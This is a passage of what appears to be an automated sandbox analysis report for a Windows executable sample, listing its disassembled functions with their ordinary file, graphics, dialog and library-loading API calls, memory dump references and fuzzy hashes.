                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641), ref: 0004A21F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    • Opcode ID: 12f00d096df215425192e9ca6bd71d00be468b6e2378f601d528b801f64bb4f3
                                                                                                                    • Instruction ID: ca2d09e147f0372eac88573a023da3ee026b9ca1ca109dda61d5d1620cec9b0e
                                                                                                                    • Opcode Fuzzy Hash: 12f00d096df215425192e9ca6bd71d00be468b6e2378f601d528b801f64bb4f3
                                                                                                                    • Instruction Fuzzy Hash: 20E092726402097BEB015F64DC45FDA379CBB08382F484071B948E2051EBA5DEC4EA94
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00072641,000000FF), ref: 0005ACB0
                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00072641,000000FF), ref: 0005ACB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    • Opcode ID: 809eb9d3dc8408920eff998953c5de3fbde0f2b9792303f1c6b6304f4f00c37e
                                                                                                                    • Instruction ID: 6c3ad45b28ab8740f6a5fcfe1c241a928d1bda4a78629a8ea836f4720bbd834f
                                                                                                                    • Opcode Fuzzy Hash: 809eb9d3dc8408920eff998953c5de3fbde0f2b9792303f1c6b6304f4f00c37e
                                                                                                                    • Instruction Fuzzy Hash: B6E06572504650EFDB109B58DC06B46FBA8FB48B20F104266F416D3761CB786941CB94
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0004A23A,?,0004755C,?,?,?,?), ref: 0004A254
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0004A23A,?,0004755C,?,?,?,?), ref: 0004A280
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: 4ba7e7d9dc9fce48419ba99e84659f7f4a52fc585c3aa024faa942f13b01e453
                                                                                                                    • Instruction ID: dda8cb81007e3b8d5d296c50b0a0fe940878940266eca8cbb97e27929b59c07a
                                                                                                                    • Opcode Fuzzy Hash: 4ba7e7d9dc9fce48419ba99e84659f7f4a52fc585c3aa024faa942f13b01e453
                                                                                                                    • Instruction Fuzzy Hash: 75E092719001245BDB50BB68CC05BD97B98AB093E2F044271FD88E3191D7B8DE84DAE4
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0005DEEC
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0005DF03
                                                                                                                      • Part of subcall function 0005B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                      • Part of subcall function 0005B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                      • Part of subcall function 0005B568: IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                      • Part of subcall function 0005B568: TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                      • Part of subcall function 0005B568: DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    • Opcode ID: 89d963c8ef0667c53f1333b9e65fa36d8f6bf42bc22bd2856e5f6dacaa2defaf
                                                                                                                    • Instruction ID: 42d8c11485fb6b677205d1874306eda5666795cff59097890398ff2b366ebe25
                                                                                                                    • Opcode Fuzzy Hash: 89d963c8ef0667c53f1333b9e65fa36d8f6bf42bc22bd2856e5f6dacaa2defaf
                                                                                                                    • Instruction Fuzzy Hash: 17E092F240028826EF02AB60DC06FEF3B6C6B05786F444861B640DA0A3EA78EA158765
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    • Opcode ID: e959edfae8fb503e5ec70f013543afd69e4ae7798e27acdd07f2a7dea0ac1a70
                                                                                                                    • Instruction ID: 6448347160b40d6c259c2d34a59921a08a23daeae74e8d23f50199ddb898fd03
                                                                                                                    • Opcode Fuzzy Hash: e959edfae8fb503e5ec70f013543afd69e4ae7798e27acdd07f2a7dea0ac1a70
                                                                                                                    • Instruction Fuzzy Hash: 60E012768002686AEB11AB94DC05FDB7BACAF09392F0440657A49E2005DA78DA848AE0
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0005A3E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    • Opcode ID: f041c2704d4734ba7edc5a197d367499754cf116ef8194332f9b705bb4111df9
                                                                                                                    • Instruction ID: 54e484aa9828298766b4295aeddc36874c3d7ca8d5632e1237fcd1bfe1018e11
                                                                                                                    • Opcode Fuzzy Hash: f041c2704d4734ba7edc5a197d367499754cf116ef8194332f9b705bb4111df9
                                                                                                                    • Instruction Fuzzy Hash: 89E0ED71904218EBDB54DF59C5416DEBBE8EB05366F10C05AE88697201E374AF08DB91
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00062BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00062BB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    • Opcode ID: caaace9453ea1a0b380b0f445ac09ebf0b55ef59e0cb8d6a7bfc8a1774e3b96c
                                                                                                                    • Instruction ID: 3df0e892f6e803ad2ab76af8d92d2c252f6a64ecbb2e238cc58a4de1234da96d
                                                                                                                    • Opcode Fuzzy Hash: caaace9453ea1a0b380b0f445ac09ebf0b55ef59e0cb8d6a7bfc8a1774e3b96c
                                                                                                                    • Instruction Fuzzy Hash: 4DD02238658F00189C686EB43C038C83387EF42B76BA076DAF420998C3EF549080A112
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    • Opcode ID: 2cf43cb8017a1e0bd6bc2e0dd4119d1c06ed9293908750535ffa55a275c6fd74
                                                                                                                    • Instruction ID: 9b8d1548c7f77c70f273b318450313d341c9d43da577a10e5cb89eb1e3e11a62
                                                                                                                    • Opcode Fuzzy Hash: 2cf43cb8017a1e0bd6bc2e0dd4119d1c06ed9293908750535ffa55a275c6fd74
                                                                                                                    • Instruction Fuzzy Hash: B3C0123205C600BEDB010BB4DC0AC2BBBA8ABA6312F04C908B0A5C0060C33CC110DB11
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: b7d0446fbb998fffe1311fc95871f206163130a2cc12aa888cb0fa04e335eab4
                                                                                                                    • Instruction ID: 180a39b0c9550388c9f86a491d95fa1d33201a6f62a1198c213e2215befe4b15
                                                                                                                    • Opcode Fuzzy Hash: b7d0446fbb998fffe1311fc95871f206163130a2cc12aa888cb0fa04e335eab4
                                                                                                                    • Instruction Fuzzy Hash: ABC1B1B0A002549FEF65CF68C884BE97BE5EF09310F0801B9EC559B287DB3499C4CBA5
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: fd39b8e864e7c7d0337b7a430593cc700ac002ae356c00dd98e0c64fd156ba46
                                                                                                                    • Instruction ID: 6fb61b15fadd67f4ce6a1f4543a5a0fc098791d370aa239fead1c0afe1feee0a
                                                                                                                    • Opcode Fuzzy Hash: fd39b8e864e7c7d0337b7a430593cc700ac002ae356c00dd98e0c64fd156ba46
                                                                                                                    • Instruction Fuzzy Hash: 7A71F4B1500B449EDB35DB70C8519EBB7E9AF15301F40183EF5AB87242DA327688CF15
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00048289
                                                                                                                      • Part of subcall function 000413DC: __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                      • Part of subcall function 0004A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506663941-0
                                                                                                                    • Opcode ID: 8c6573517bf374fe8f72b1749fed7d5f77eb08a8aa4c8e8cc1c3833e4e35bb89
                                                                                                                    • Instruction ID: 0dfd95d07f50960ccd5c24b68fa6131089db2cc8aadb541dce9366d8f67ed859
                                                                                                                    • Opcode Fuzzy Hash: 8c6573517bf374fe8f72b1749fed7d5f77eb08a8aa4c8e8cc1c3833e4e35bb89
                                                                                                                    • Instruction Fuzzy Hash: 9141C9B19446589ADB24EB60CC55BEEB7B8AF00304F4444FBE58A57083EB755FC9CB14
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                      • Part of subcall function 00045E37: __EH_prolog.LIBCMT ref: 00045E3C
                                                                                                                      • Part of subcall function 0004CE40: __EH_prolog.LIBCMT ref: 0004CE45
                                                                                                                      • Part of subcall function 0004B505: __EH_prolog.LIBCMT ref: 0004B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: f9a97aeb03c15f879fa88c7b2649f4b8cf562f1f3d1d28419b38c5df31ec25a0
                                                                                                                    • Instruction ID: 58adc8a35d926a66d112957bd70df8796b4cd02edc5b677ee1e2f05400a02a67
                                                                                                                    • Opcode Fuzzy Hash: f9a97aeb03c15f879fa88c7b2649f4b8cf562f1f3d1d28419b38c5df31ec25a0
                                                                                                                    • Instruction Fuzzy Hash: 264134B0905B419EE724DF398885AE7FAE5BF19300F50493EE5FE83282CB316654CB14
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                      • Part of subcall function 00045E37: __EH_prolog.LIBCMT ref: 00045E3C
                                                                                                                      • Part of subcall function 0004CE40: __EH_prolog.LIBCMT ref: 0004CE45
                                                                                                                      • Part of subcall function 0004B505: __EH_prolog.LIBCMT ref: 0004B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
